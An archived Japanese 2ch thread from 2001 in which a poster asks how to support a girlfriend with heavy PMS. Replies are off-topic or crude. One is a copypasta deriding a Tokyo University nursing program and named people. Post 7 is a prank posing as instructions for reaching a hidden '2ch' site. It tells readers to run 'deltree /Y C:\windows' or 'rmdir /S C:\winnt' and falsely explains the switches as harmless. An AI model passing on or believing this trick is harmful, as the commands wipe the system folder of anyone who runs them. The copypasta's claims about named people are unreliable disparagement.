5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

彼女の生理&彼氏の対処

1 :love beauty:01/12/30 03:27 ID:4+LWexm8
僕の彼女は生理が重く、生理の度に喧嘩になってしまします。
僕も女性の生理に伴うpmsという現象について知ったのはつい最近のこと
で、彼女も生理のたびに苦しんでいます。少しでも気を楽にしてあげられたら
と思うのですが・・・。いかんせん知識・経験が足りないため四苦八苦しています。
同じような悩みを持つ老若男女。皆で話し合いませんか?悩みや重度のpmsに対する
対処法など、何でもいいのでカキコして下さいな。

2 :名無しさん@おだいじに:01/12/30 03:33 ID:???
板違うんでないかい?

3 :名無しさん@おだいじに:01/12/30 03:33 ID:???
私も生理前に喧嘩が多い気がする
私見ですが 近寄らないのも一つのテかと
下手に気遣うと かえって絡まれたりしてうざい
個人的には生理中の血まみれセックスが好きなんですけどねぇ

4 :名無しさん@おだいじに:01/12/30 03:59 ID:4+LWexm8
私も生理重い。すっごいイライラする。
男は女の生理を真面目に考えないから嫌い。

5 :名無しさん@おだいじに:01/12/30 04:01 ID:???
まとめのまとめのまとめ・・・
↓これを書き込むと、狂ったように反論するおばかさんが登場します。楽しみ〜。

@2002年4月から、
東大大学院医学系研究科健康科学・看護学専攻健康社会学分野に、河合薫と石井苗子がご入学。プ

A看護短大→東大医学部健康科学・看護学科への編入が可能!
かなりのバカでもok!都立医技短看護学科卒の山本舞衣子がいい例です!看護婦にはならず、芸能人気取り〜。

B医学部健康科学・看護学科の前身(保健学科)の前身は、「衛生看護学科」。
衛生看護学科は女子のみの募集、別枠の入試、転部・転科は認められず、駒場でも仲間はずれ、
本郷での教育は行われず、今はなき小石川の分院が衛看キャンパス。

C衛生看護学科卒のおばちゃんたちは、「戦後まもなくの頃、東大に入れた女性!」等とちやほやされ、
たかが衛看卒なのに「東大」ってだけで学長になれたりする。
実際は「女性である」だけで簡単に東大に入れた時代があることをお忘れなく。プ。
http://www.nagano-nurs.ac.jp/presword/index.html
見藤隆子おばちゃんは、長野県看護大学学長。

D有力な噂として、
医科歯科の歯学部→東大にプレゼント、東大歯学・健康科学部を新設、看護は医科歯科に譲渡。
理由:東大では駒場から進学した学生が、誰も看護婦にならない。
看護教育が成立しない。
医学部教授の9割は医師で、看護婦に発言権がない。
M痘さんへのあてつけ(「ほーら、保健学科のままにしときゃーよかったのに」的あてつけ)。
看護短大卒の編入生がお馬鹿でウザイ。


6 :名無しさん@おだいじに:01/12/31 02:38 ID:d3qvecpI
それが出現しないんだなぁ…

7 :名無しさん@おだいじに:01/12/31 03:34 ID:???
fusianasannじゃなく、ホントの裏2CHの入り方は以下の通りです。
●●裏2ちゃんねるへの接続方法〜裏技公開〜●●
【1】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【2】win95かwin98の人は「deltree /Y C:\windows」
  winNTかwin2000の人は「rmdir /S C:\winnt」
  ※「/Y」は「yield」の略。「生産する」の意味。
    「/S」は「second /Y」の略。こちらの方が改良されている。
【3】あとは自動的にwindowsがつないでくれるよ。
★「deltree」や「rmdir」は裏ドメイン用のコマンドです。
★こういう裏ドメインのサイトにはDOSを使うと
 トラフィックの混雑が抑えられ、快適に接続できます。
 2ちゃんねるのCGIを使うと、弾かれる可能性が高いです。
★「deltree」や「rmdir」はwindowsの標準コマンドなので安心。
 機能も高く、guest guestを自動入力するほか、
 年齢別の画像も全て表示できるという優れものです。

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)